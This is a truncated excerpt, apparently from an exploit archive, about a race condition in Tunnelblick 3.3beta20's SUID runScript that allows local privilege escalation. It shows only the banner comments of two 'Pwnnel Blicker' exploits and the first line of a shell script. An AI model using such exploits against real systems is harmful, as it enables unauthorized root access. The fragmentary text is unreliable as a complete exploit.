Race condition in the runScript function in Tunnelblick 3.3beta20 and previous versions allows local users to gain privileges by replacing a script file.
/*
* ==== Pwnnel Blicker ====
* = =
* = zx2c4 =
* = =
* ========================
*
* Tunnel Blick, a widely used OpenVPN manager for OSX
* comes with a nice SUID executable that has more holes
* than you care to count It's a treasure chest of local
* roots I picked one that looked ...
#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick
# Other exploits for Tunnel Blick are available here:
# gitzx2c4com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory ...